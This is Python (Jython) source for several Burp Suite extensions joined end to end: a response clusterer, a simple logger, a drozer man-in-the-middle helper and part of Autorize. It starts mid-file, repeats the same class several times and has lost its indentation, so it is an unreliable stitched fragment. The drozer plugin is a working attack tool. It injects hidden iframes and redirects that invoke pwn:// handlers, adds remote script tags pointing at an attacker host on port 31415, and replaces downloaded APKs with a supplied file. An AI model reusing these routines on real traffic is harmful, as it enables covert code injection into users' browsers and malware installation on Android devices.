scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# List of log entries
self._log_entries = []
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
#Setup the options
self._optionsJPanel = JPanel()
gridBagLayout = GridBagLayout()
gbc = GridBagConstraints()
self._optionsJPanel.setLayout(gridBagLayout)
self.max_clusters = 500
self.JLabel_max_clusters = JLabel("Maximum amount of clusters: ")
gbc.gridy = 0
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_max_clusters, gbc)
self.JTextField_max_clusters = JTextField(str(self.max_clusters), 5)
self.JTextField_max_clusters.getDocument().addDocumentListener(self)
gbc.gridx = 1
self._optionsJPanel.add(self.JTextField_max_clusters, gbc)
callbacks.customizeUiComponent(self.JLabel_max_clusters)
callbacks.customizeUiComponent(self.JTextField_max_clusters)
self.similarity = 0.95
self.JLabel_similarity = JLabel("Similarity (between 0 and 1)")
gbc.gridy = 1
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_similarity, gbc)
self.JTextField_similarity = JTextField(str(self.similarity), 5)
self.JTextField_similarity.getDocument().addDocumentListener(self)
gbc.gridx = 1
self._optionsJPanel.add(self.JTextField_similarity, gbc)
callbacks.customizeUiComponent(self.JLabel_similarity)
callbacks.customizeUiComponent(self.JTextField_similarity)
self.use_quick_similar = False
self.JLabel_use_quick_similar = JLabel(
"Use set intersection of space splitted tokens for similarity (default: optimized difflib.SequenceMatcher.quick_ratio)"
)
gbc.gridy = 2
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_use_quick_similar, gbc)
self.JCheckBox_use_quick_similar = JCheckBox("")
self.JCheckBox_use_quick_similar.addActionListener(self)
gbc.gridx = 1
self._optionsJPanel.add(self.JCheckBox_use_quick_similar, gbc)
callbacks.customizeUiComponent(self.JCheckBox_use_quick_similar)
self.response_max_size = 10 * 1024 #10kb
self.JLabel_response_max_size = JLabel("Response max size (bytes)")
gbc.gridy = 3
gbc.gridx = 0
self._optionsJPanel.add(self.JLabel_response_max_size, gbc)
self.JTextField_response_max_size = JTextField(
str(self.response_max_size), 5)
self.JTextField_response_max_size.getDocument().addDocumentListener(
self)
gbc.gridx = 1
self._optionsJPanel.add(self.JTextField_response_max_size, gbc)
callbacks.customizeUiComponent(self.JLabel_response_max_size)
callbacks.customizeUiComponent(self.JTextField_response_max_size)
self.uninteresting_mime_types = ('JPEG', 'CSS', 'GIF', 'script', 'GIF',
'PNG', 'image')
self.uninteresting_status_codes = ()
self.uninteresting_url_file_extensions = ('js', 'css', 'zip', 'war',
'jar', 'doc', 'docx', 'xls',
'xlsx', 'pdf', 'exe', 'dll',
'png', 'jpeg', 'jpg', 'bmp',
'tif', 'tiff', 'gif', 'webp',
'm3u', 'mp4', 'm4a', 'ogg',
'aac', 'flac', 'mp3', 'wav',
'avi', 'mov', 'mpeg', 'wmv',
'swf', 'woff', 'woff2')
about = "<html>"
about += "Author: floyd, @floyd_ch, http://www.floyd.ch<br>"
about += "modzero AG, http://www.modzero.ch<br>"
about += "<br>"
about += "<h3>Getting an overview of the tested website</h3>"
about += "<p style=\"width:500px\">"
about += "This plugin clusters all response bodies by similarity and shows a summary, one request/response per cluster. "
about += 'Adjust similarity in the options if you get too few or too many entries in the "One member of each cluster" '
about += "tab. The plugin will allow a tester to get an overview of the tested website's responses from all tools (scanner, proxy, etc.). "
about += "As similarity comparison "
about += "can use a lot of ressources, only small, in-scope responses that have interesting response codes, "
about += "file extensions and mime types are processed. "
about += "</p>"
about += "</html>"
self.JLabel_about = JLabel(about)
self.JLabel_about.setLayout(GridBagLayout())
self._aboutJPanel = JScrollPane(self.JLabel_about)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the splitpane and options to the main jtabedpane
self._main_jtabedpane.addTab("One member of each cluster", None,
self._splitpane, None)
self._main_jtabedpane.addTab("Options", None, self._optionsJPanel,
None)
self._main_jtabedpane.addTab("About & README", None, self._aboutJPanel,
None)
# clusters will grow up to self.max_clusters response bodies...
self._clusters = set()
self.Similarity = Similarity()
# Now load the already stored
with self._lock:
log_entries_from_storage = self.load_project_setting("log_entries")
if log_entries_from_storage:
for toolFlag, req, resp, url in log_entries_from_storage:
try:
self.add_new_log_entry(toolFlag, req, resp, url)
except Exception as e:
print "Exception when deserializing a stored log entry", toolFlag, url
print e
# Important: Do this at the very end (otherwise we could run into troubles locking up entire threads)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
#
# implement what happens when options are changed
#
def changedUpdate(self, document):
pass
def removeUpdate(self, document):
self.actionPerformed(None)
def insertUpdate(self, document):
self.actionPerformed(None)
def actionPerformed(self, actionEvent):
self.use_quick_similar = self.JCheckBox_use_quick_similar.isSelected()
try:
self.max_clusters = int(self.JTextField_max_clusters.getText())
except:
self.JTextField_max_clusters.setText("200")
try:
self.similarity = float(self.JTextField_similarity.getText())
if self.similarity > 1.0 or self.similarity < 0.0:
self.JTextField_similarity.setText("0.9")
except:
self.JTextField_similarity.setText("0.9")
try:
self.response_max_size = float(
self.JTextField_response_max_size.getText())
if self.response_max_size < 0.0:
self.JTextField_response_max_size.setText(str(10 * 1024))
except:
self.JTextField_response_max_size.setText(str(10 * 1024))
print self.JCheckBox_use_quick_similar.isSelected(
), self.JTextField_max_clusters.getText(
), self.JTextField_similarity.getText(
), self.JTextField_response_max_size.getText()
#
# implement ITab
#
def getTabCaption(self):
return "Response Clusterer"
def getUiComponent(self):
return self._main_jtabedpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
if not messageIsRequest:
if len(self._clusters) >= self.max_clusters:
return
resp = messageInfo.getResponse()
if len(resp) >= self.response_max_size:
print "Message was too long"
return
iResponseInfo = self._helpers.analyzeResponse(resp)
mime_type = iResponseInfo.getStatedMimeType()
if mime_type in self.uninteresting_mime_types:
print "Mime type", mime_type, "is ignored"
return
if iResponseInfo.getStatusCode(
) in self.uninteresting_status_codes:
print "Status code", iResponseInfo.getStatusCode(
), "is ignored"
return
req = messageInfo.getRequest()
iRequestInfo = self._helpers.analyzeRequest(messageInfo)
if not iRequestInfo.getUrl():
print "iRequestInfo.getUrl() returned None, so bailing out of analyzing this request"
return
if '.' in iRequestInfo.getUrl().getFile() and iRequestInfo.getUrl(
).getFile().split(
'.')[-1] in self.uninteresting_url_file_extensions:
print iRequestInfo.getUrl().getFile().split(
'.')[-1], "is an ignored file extension"
return
if not self._callbacks.isInScope(iRequestInfo.getUrl()):
print iRequestInfo.getUrl(), "is not in scope"
return
body = resp[iResponseInfo.getBodyOffset():]
with self._lock:
similarity_func = self.Similarity.similar
if self.use_quick_similar:
similarity_func = self.Similarity.quick_similar
start_time = time.time()
for response_code, item in self._clusters:
if not response_code == iResponseInfo.getStatusCode():
#Different response codes -> different clusters
continue
if similarity_func(str(body), str(item), self.similarity):
return #break
else: #when no break/return occures in the for loop
self.add_new_log_entry(toolFlag, req, resp,
iRequestInfo.getUrl().toString())
self.save_project_setting("log_entries", self._log_entries)
taken_time = time.time() - start_time
if taken_time > 0.5:
print "Plugin took", taken_time, "seconds to process request... body length:", len(
body), "current cluster length:", len(self._clusters)
print "URL:", str(iRequestInfo.getUrl()),
def add_new_log_entry(self, toolFlag, request, response, service_url):
self._log_entries.append((toolFlag, request, response, service_url))
iResponseInfo = self._helpers.analyzeResponse(response)
body = response[iResponseInfo.getBodyOffset():]
self._clusters.add((iResponseInfo.getStatusCode(), str(body)))
row = self._log.size()
service = CustomHttpService(service_url)
r = CustomRequestResponse(None, None, service, request, response)
iRequestInfo = self._helpers.analyzeRequest(r)
self._log.add(
LogEntry(toolFlag, self._callbacks.saveBuffersToTempFiles(r),
iRequestInfo.getUrl()))
self.fireTableRowsInserted(row, row)
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
def save_project_setting(self, name, value):
value = pickle.dumps(value).encode("base64")
request = "GET /"+name+" HTTP/1.0\r\n\r\n" \
"You can ignore this item in the site map. It was created by the ResponseClusterer extension. The \n" \
"reason is that the Burp API is missing a certain functionality to save settings. \n" \
"TODO Burp API limitation: This is a hackish way to be able to store project-scope settings.\n" \
"We don't want to restore requests/responses of tabs in a totally different Burp project.\n" \
"However, unfortunately there is no saveExtensionProjectSetting in the Burp API :(\n" \
"So we have to abuse the addToSiteMap API to store project-specific things\n" \
"Even when using this hack we currently cannot persist Collaborator interaction checks\n" \
"(IBurpCollaboratorClientContext is not serializable and Threads loose their Python class\n" \
"functionality when unloaded) due to Burp API limitations."
response = None
if value:
response = "HTTP/1.1 200 OK\r\n" + value
rr = CustomRequestResponse(
name, '',
CustomHttpService('http://responseclustererextension.local/'),
request, response)
self._callbacks.addToSiteMap(rr)
def load_project_setting(self, name):
rrs = self._callbacks.getSiteMap(
'http://responseclustererextension.local/' + name)
if rrs:
rr = rrs[0]
if rr.getResponse():
val = "\r\n".join(
FloydsHelpers.jb2ps(rr.getResponse()).split("\r\n")[1:])
return pickle.loads(val.decode("base64"))
else:
return None
else:
return None
class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel):
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Custom logger")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# main split pane
self._splitpane = JSplitPane(JSplitPane.VERTICAL_SPLIT)
# table of log entries
logTable = Table(self)
scrollPane = JScrollPane(logTable)
self._splitpane.setLeftComponent(scrollPane)
# tabs with request/response viewers
tabs = JTabbedPane()
self._requestViewer = callbacks.createMessageEditor(self, False)
self._responseViewer = callbacks.createMessageEditor(self, False)
tabs.addTab("Request", self._requestViewer.getComponent())
tabs.addTab("Response", self._responseViewer.getComponent())
self._splitpane.setRightComponent(tabs)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(tabs)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
#
# implement ITab
#
def getTabCaption(self):
return "Logger"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# only process requests
if not messageIsRequest:
# create a new log entry with the message details
self._lock.acquire()
row = self._log.size()
self._log.add(LogEntry(toolFlag, self._callbacks.saveBuffersToTempFiles(messageInfo),
self._helpers.analyzeRequest(messageInfo).getUrl()))
self.fireTableRowsInserted(row, row)
self._lock.release()
return
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 2
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Tool"
if columnIndex == 1:
return "URL"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return self._callbacks.getToolName(logEntry._tool)
if columnIndex == 1:
return logEntry._url.toString()
return ""
#
# implement IMessageEditorController
# this allows our request/response viewers to obtain details about the messages being displayed
#
def getHttpService(self):
return self._currentlyDisplayedItem.getHttpService()
def getRequest(self):
return self._currentlyDisplayedItem.getRequest()
def getResponse(self):
return self._currentlyDisplayedItem.getResponse()
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel):
#
# Evil global variables
# Be ready to receive hate mail Tyrone & Daniel!
#
apkRequests = {}
#
# Executors
#
def injectPwn(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(
response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
if not self.tools[2].getTickBoxTicked():
# Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<iframe src="pwn://lol" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>',
body)
else:
# Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<script>window.location="pwn://www.google.com/pluginerror.html"</script></body>',
body)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(
changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(
self._helpers.analyzeRequest(messageInfo).getUrl(),
"Injected drozer invocation with pwn://")
return
def injectJs(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(
response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
editBoxStr = str(self.tools[0].getEditBox())
# Inject arbitrary script into responses
changedContent = re.sub(
re.compile(r'<head>', re.IGNORECASE),
'<head><script src="' + editBoxStr + '"></script>', body)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<script src="' + editBoxStr + '"></script></body>',
changedContent)
changedContent = re.sub(
re.compile(r'<content>',
re.IGNORECASE), '<content><script src="' +
editBoxStr + '"></script>', changedContent)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(
changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(
self._helpers.analyzeRequest(messageInfo).getUrl(),
"Injected JavaScript from " + editBoxStr)
return
def modifyAPKRequest(self, messageInfo):
# Get requested path
req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
reqUrl = req.getUrl()
headers = list(req.getHeaders()) # convert to python list
reqHost = reqUrl.getHost()
reqPath = reqUrl.getPath()
reqPort = reqUrl.getPort()
# If it ends in .apk then change type to HEAD
if reqPath.upper().endswith(".APK"):
self.addLog(reqUrl, "Got request for APK...")
# Determine whether an HTTP or HTTPS connection must be made
if reqPort == 443:
conn = http.client.HTTPSConnection(reqHost, reqPort)
else:
conn = http.client.HTTPConnection(reqHost, reqPort)
# Get headers from user request
httpLibHeaders = {}
for i in headers:
splitHeaders = i.split(": ")
if len(splitHeaders) == 2:
httpLibHeaders[splitHeaders[0]] = splitHeaders[1]
# Perform HEAD on target file from server using headers
conn.request("HEAD", reqPath, headers=httpLibHeaders)
response = conn.getresponse()
responseHeaders = response.getheaders()
# Add to information for use by injectAPK()
version = ""
if str(response.version) == "11":
version = "HTTP/1.1"
else:
version = "HTTP/1.0"
self.apkRequests[reqPath] = [
reqUrl, version + " " + str(response.status) + " " +
str(response.reason), responseHeaders
]
print(self.apkRequests[reqPath])
# Instead of passing request - change host to www.google.com which will be non existent
httpService = messageInfo.getHttpService()
messageInfo.setHttpService(
self._callbacks.getHelpers().buildHttpService(
"www.google.com", httpService.getPort(),
httpService.getProtocol()))
return
def injectAPK(self, messageInfo):
# Get requested path
req = self._callbacks.getHelpers().analyzeRequest(messageInfo)
reqUrl = req.getUrl()
reqHost = reqUrl.getHost()
reqPath = reqUrl.getPath()
reqPort = reqUrl.getPort()
# If it ends in .apk then replace it!
if reqPath.upper().endswith(".APK"):
# Check this is a request we have seen
if reqPath in self.apkRequests:
# Get stored url and header
res = self.apkRequests[reqPath]
url = res[0]
httpStatus = res[1]
headers = []
headers.append(httpStatus)
for i in res[2]:
headers.append(i[0] + ': ' + ''.join(i[1:]))
# Open and read APK from specified path
f = open(self.tools[1].getEditBox())
changedContentBytes = f.read()
f.close()
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Replace response with new APK
messageInfo.setResponse(final)
self.addLog(url, "Replaced APK!")
return
def injectCustomURI(self, messageInfo):
# Get response
response = messageInfo.getResponse()
responseParsed = self._helpers.analyzeResponse(response)
body = self._callbacks.getHelpers().bytesToString(
response)[responseParsed.getBodyOffset():]
headers = responseParsed.getHeaders()
uri = self.tools[3].getEditBox()
if not self.tools[3].getTickBoxTicked():
# Method 1 - silent invocation - Inject iframe loading from pwn:// into responses (case insensitive)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE), '<iframe src="' + uri +
'" width=1 height=1 style="visibility:hidden;position:absolute"></iframe></body>',
body)
else:
# Method 2 - active invocation - redirect to the pwn:// handler (this is a requirement for versions of Chromium >= 25)
changedContent = re.sub(
re.compile(r'</body>', re.IGNORECASE),
'<script>window.location="' + uri + '"</script></body>', body)
changedContentBytes = self._callbacks.getHelpers().stringToBytes(
changedContent)
final = self._callbacks.getHelpers().buildHttpMessage(
headers, changedContentBytes)
# Set the response if the content changed and add to log
if body != changedContent:
messageInfo.setResponse(final)
self.addLog(
self._helpers.analyzeRequest(messageInfo).getUrl(),
"Injected custom URI")
return
def nothing(self, messageInfo):
pass
#
# implement IBurpExtender
#
def registerExtenderCallbacks(self, callbacks):
# Make available to whole class
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("MitM helper plugin for drozer")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
# Split pane
self._splitpane = swing.JSplitPane(swing.JSplitPane.HORIZONTAL_SPLIT)
# Create Tab
topPanel = swing.JPanel()
topPanel.setLayout(swing.BoxLayout(topPanel, swing.BoxLayout.Y_AXIS))
# Define all tools
self.tools = []
self.tools.append(
Tool(180, "JavaScript Injection",
"Inject Remote JS into HTTP Responses", self.nothing,
self.injectJs, "JS Location", "http://x.x.x.x:31415/dz.js"))
self.tools.append(
Tool(180, "APK Replacement",
"Replace APK with specified one when requested",
self.modifyAPKRequest, self.injectAPK, "APK Location", "",
True))
self.tools.append(
Tool(
170, "Invoke drozer using pwn://",
"Inject code into HTTP Responses that invokes installed drozer agent",
self.nothing, self.injectPwn, None, None, None,
"Perform active invocation (required for Chromium >= 25)"))
self.tools.append(
Tool(
220, "Custom URI Handler Injection",
"Inject code into HTTP Responses that invokes specified URI handler",
self.nothing, self.injectCustomURI, "URI", "pwn://me", None,
"Perform active invocation (required for Chromium >= 25)"))
# Add all tools to panel
for i in self.tools:
topPanel.add(i.getPanel())
self._splitpane.setLeftComponent(topPanel)
# table of log entries
logTable = Table(self)
logTable.setAutoResizeMode(swing.JTable.AUTO_RESIZE_ALL_COLUMNS)
logTable.getColumn("Time").setPreferredWidth(120)
logTable.getColumn("URL").setPreferredWidth(500)
scrollPane = swing.JScrollPane(logTable)
self._splitpane.setRightComponent(scrollPane)
# customize our UI components
callbacks.customizeUiComponent(self._splitpane)
callbacks.customizeUiComponent(logTable)
callbacks.customizeUiComponent(scrollPane)
callbacks.customizeUiComponent(topPanel)
# add the custom tab to Burp's UI
callbacks.addSuiteTab(self)
# register ourselves as an HTTP listener
callbacks.registerHttpListener(self)
return
def addLog(self, url, action):
self._lock.acquire()
row = self._log.size()
self._log.add(
LogEntry(strftime("%Y-%m-%d %H:%M:%S", gmtime()), url, action))
self.fireTableRowsInserted(row, row)
self._lock.release()
#
# implement ITab
#
def getTabCaption(self):
return "drozer"
def getUiComponent(self):
return self._splitpane
#
# implement IHttpListener
#
def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
# Execute all enabled tools
for i in self.tools:
if i.getButtonEnabled():
if messageIsRequest:
i.getRequestExecutor()(messageInfo)
else:
i.getResponseExecutor()(messageInfo)
#
# extend AbstractTableModel
#
def getRowCount(self):
try:
return self._log.size()
except:
return 0
def getColumnCount(self):
return 3
def getColumnName(self, columnIndex):
if columnIndex == 0:
return "Time"
if columnIndex == 1:
return "URL"
if columnIndex == 2:
return "Action"
return ""
def getValueAt(self, rowIndex, columnIndex):
logEntry = self._log.get(rowIndex)
if columnIndex == 0:
return logEntry._time
if columnIndex == 1:
return logEntry._url
if columnIndex == 2:
return logEntry._action
return ""
class BurpExtender(IBurpExtender, ITab, IHttpListener,
IMessageEditorController, AbstractTableModel,
IContextMenuFactory):
def registerExtenderCallbacks(self, callbacks):
# keep a reference to our callbacks object
self._callbacks = callbacks
# obtain an extension helpers object
self._helpers = callbacks.getHelpers()
# set our extension name
callbacks.setExtensionName("Autorize")
# create the log and a lock on which to synchronize when adding log entries
self._log = ArrayList()
self._lock = Lock()
self.intercept = 0
self.initInterceptionFilters()
self.initEnforcementDetector()
self.initExport()
self.initConfigurationTab()
self.initTabs()
self.initCallbacks()
print "Thank you for installing Autorize v0.9 extension"
print "by Barak Tawily"
return
def initExport(self):
#
## init enforcement detector tab
#
exportLType = JLabel("File Type:")
exportLType.setBounds(10, 10, 100, 30)
exportLES = JLabel("Enforcement Statuses:")
exportLES.setBounds(10, 50, 160, 30)
exportFileTypes = ["HTML"]
self.exportType = JComboBox(exportFileTypes)
self.exportType.setBounds(100, 10, 200, 30)
exportES = [
"All Statuses", "Authorization bypass!",
"Authorization enforced??? (please configure enforcement detector)",
"Authorization enforced!"
]
self.exportES = JComboBox(exportES)
self.exportES.setBounds(100, 50, 200, 30)
exportLES = JLabel("Statuses:")
exportLES.setBounds(10, 50, 100, 30)
self.exportButton = JButton("Export",
actionPerformed=self.exportToHTML)
self.exportButton.setBounds(390, 25, 100, 30)
self.exportPnl = JPanel()
self.exportPnl.setLayout(None)
self.exportPnl.setBounds(0, 0, 1000, 1000)
self.exportPnl.add(exportLType)
self.exportPnl.add(self.exportType)
self.exportPnl.add(exportLES)
self.exportPnl.add(self.exportES)
self.exportPnl.add(self.exportButton)
def initEnforcementDetector(self):
#
## init enforcement detector tab
#
self.EDFP = ArrayList()
self.EDCT = ArrayList()
EDLType = JLabel("Type:")
EDLType.setBounds(10, 10, 140, 30)
EDLContent = JLabel("Content:")
EDLContent.setBounds(10, 50, 140, 30)
EDLabelList = JLabel("Filter List:")
EDLabelList.setBounds(10, 165, 140, 30)
EDStrings = [
"Finger Print: (enforced message body contains)",
"Content-Length: (constant Content-Length number of enforced response)"
]
self.EDType = JComboBox(EDStrings)
self.EDType.setBounds(80, 10, 430, 30)
self.EDText = JTextArea("", 5, 30)
self.EDText.setBounds(80, 50, 300, 110)
self.EDModel = DefaultListModel()
self.EDList = JList(self.EDModel)
self.EDList.setBounds(80, 175, 300, 110)
self.EDList.setBorder(LineBorder(Color.BLACK))
self.EDAdd = JButton("Add filter", actionPerformed=self.addEDFilter)
self.EDAdd.setBounds(390, 85, 120, 30)
self.EDDel = JButton("Remove filter", actionPerformed=self.delEDFilter)
self.EDDel.setBounds(390, 210, 120, 30)
self.EDPnl = JPanel()
self.EDPnl.setLayout(None)
self.EDPnl.setBounds(0, 0, 1000, 1000)
self.EDPnl.add(EDLType)
self.EDPnl.add(self.EDType)
self.EDPnl.add(EDLContent)
self.EDPnl.add(self.EDText)
self.EDPnl.add(self.EDAdd)
self.EDPnl.add(self.EDDel)
self.EDPnl.add(EDLabelList)
self.EDPnl.add(self.EDList)
def initInterceptionFilters(self):
#
## init interception filters tab
#
IFStrings = [
"URL Contains: ", "Scope items only: (Content is not required)"
]
self.IFType = JComboBox(IFStrings)
self.IFType.setBounds(80, 10, 430, 30)
self.IFModel = DefaultListModel()
self.IFList = JList(self.IFModel)
self.IFList.setBounds(80, 175, 300, 110)
self.IFList.setBorder(LineBorder(Color.BLACK))
self.IFText = JTextArea("", 5, 30)
self.IFText.setBounds(80, 50, 300, 110)
IFLType = JLabel("Type:")
IFLType.setBounds(10, 10, 140, 30)
IFLContent = JLabel("Content:")
IFLContent.setBounds(10, 50, 140, 30)
IFLabelList = JLabel("Filter List:")
IFLabelList.setBounds(10, 165, 140, 30)
self.IFAdd = JButton("Add filter", actionPerformed=self.addIFFilter)
self.IFAdd.setBounds(390, 85, 120, 30)
self.IFDel = JButton("Remove filter", actionPerformed=self.delIFFilter)
self.IFDel.setBounds(390, 210, 120, 30)
self.filtersPnl = JPanel()
self.filtersPnl.setLayout(None)
self.filtersPnl.setBounds(0, 0, 1000, 1000)
self.filtersPnl.add(IFLType)
self.filtersPnl.add(self.IFType)
self.filtersPnl.add(IFLContent)
self.filtersPnl.add(self.IFText)
self.filtersPnl.add(self.IFAdd)
self.filtersPnl.add(self.IFDel)
self.filtersPnl.add(IFLabelList)
self.filtersPnl.add(self.IFList)
def initConfigurationTab(self):
#
## init configuration tab
#
self.prevent304 = JCheckBox("Prevent 304 Not Modified status code")
self.prevent304.setBounds(290, 25, 300, 30)
self.ignore304 = JCheckBox("Ignore 304/204 status code responses")
self.ignore304.setBounds(290, 5, 300, 30)
self.ignore304.setSelected(True)
self.autoScroll = JCheckBox("Auto Scroll")
self.autoScroll.setBounds(290, 45, 140, 30)
startLabel = JLabel("Authorization checks:")
startLabel.setBounds(10, 10, 140, 30)
self.startButton = JButton("Autorize is off",
actionPerformed=self.startOrStop)
self.startButton.setBounds(160, 10, 120, 30)
self.startButton.setBackground(Color(255, 100, 91, 255))
self.clearButton = JButton("Clear List",
actionPerformed=self.clearList)
self.clearButton.setBounds(10, 40, 100, 30)
self.replaceString = JTextArea("Cookie: Insert=injected; header=here;",
5, 30)
self.replaceString.setWrapStyleWord(True)
self.replaceString.setLineWrap(True)
self.replaceString.setBounds(10, 80, 470, 180)
self.filtersTabs = JTabbedPane()
self.filtersTabs.addTab("Enforcement Detector", self.EDPnl)
self.filtersTabs.addTab("Interception Filters", self.filtersPnl)
self.filtersTabs.addTab("Export", self.exportPnl)
self.filtersTabs.setBounds(0, 280, 2000, 700)
self.pnl = JPanel()
self.pnl.setBounds(0, 0, 1000, 1000)
self.pnl.setLayout(None)
self.pnl.add(self.startButton)
self.pnl.add(self.clearButton)
self.pnl.add(self.replaceString)
self.pnl.add(startLabel)
self.pnl.add(self.autoScroll)
self.pnl.add(self.ignore304)
self.pnl.add(self.prevent304)
self.pnl.add(self.filtersTabs)
def initTabs(self):
#
## init autorize tabs
#
self.logTable = Table(self)
self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
self._splitpane.setResizeWeight(1)
self.scrollPane = JScrollPane(self.logTable)
self._splitpane.setLeftComponent(self.scrollPane)
self.scrollPane.getVerticalScrollBar().addAdjustmentListener(
autoScrollListener(self))
copyURLitem = JMenuItem("Copy URL")
copyURLitem.addActionListener(copySelectedURL(self))
self.menu = JPopupMenu("Popup")
self.menu.add(copyURLitem)
self.tabs = JTabbedPane()
self._requestViewer = self._callbacks.createMessageEditor(self, False)
self._responseViewer = self._callbacks.createMessageEditor(self, False)
self._originalrequestViewer = self._callbacks.createMessageEditor(
self, False)
self._originalresponseViewer = self._callbacks.createMessageEditor(
self, False)
self.tabs.addTab("Modified Request",
self._requestViewer.getComponent())
self.tabs.addTab("Modified Response",
self._responseViewer.getComponent())
self.tabs.addTab("Original Request",
self._originalrequestViewer.getComponent())
self.tabs.addTab("Original Response",
self._originalresponseViewer.getComponent())
self.tabs.addTab("Configuration", self.pnl)
self.tabs.setSelectedIndex(4)
self._splitpane.setRightComponent(self.tabs)
def initCallbacks(self):
#
## init callbacks
#
# customize our UI components
self._callbacks.customizeUiComponent(self._splitpane)
self._callbacks.customizeUiComponent(self.logTable)
self._callbacks.customizeUiComponent(self.scrollPane)
self._callbacks.customizeUiComponent(self.tabs)
self._callbacks.customizeUiComponent(self.filtersTabs)
self._callbacks.registerContextMenuFactory(self)
# add the custom tab to Burp's UI
self._callbacks.addSuiteTab(self)
#
## Events functions
#
def startOrStop(self, event):
if self.startButton.getText() == "Autorize is off":
self.startButton.setText("Autorize is on")
self.startButton.setBackground(Color.GREEN)
self.intercept = 1
self._callbacks.registerHttpListener(self)
else:
self.startButton.setText("Autorize is off")
self.startButton.setBackground(Color(255, 100, 91, 255))
self.intercept = 0
self._callbacks.removeHttpListener(self)
def addEDFilter(self, event):
typeName = self.EDType.getSelectedItem().split(":")[0]
self.EDModel.addElement(typeName + ": " + self.EDText.getText())
def delEDFilter(self, event):
index = self.EDList.getSelectedIndex()
if not index == -1:
self.EDModel.remove(index)
def addIFFilter(self, event):
typeName = self.IFType.getSelectedItem().split(":")[0]
self.IFModel.addElement(typeName + ": " + self.IFText.getText())
def delIFFilter(self, event):
index = self.IFList.getSelectedIndex()
if not index == -1:
self.IFModel.remove(index)
def clearList(self, event):
self._lock.acquire()
self._log = ArrayList()
row = self._log.size()
self.fireTableRowsInserted(row, row)
self._lock.release()
def exportToHTML(self, event):
parentFrame = JFrame()
fileChooser = JFileChooser()
fileChooser.setSelectedFile(File("AutorizeReprort.html"))
fileChooser.setDialogTitle("Save Autorize Report")
userSelection = fileChooser.showSaveDialog(parentFrame)
if userSelection == JFileChooser.APPROVE_OPTION:
fileToSave = fileChooser.getSelectedFile()
enforcementStatusFilter = self.exportES.getSelectedItem()
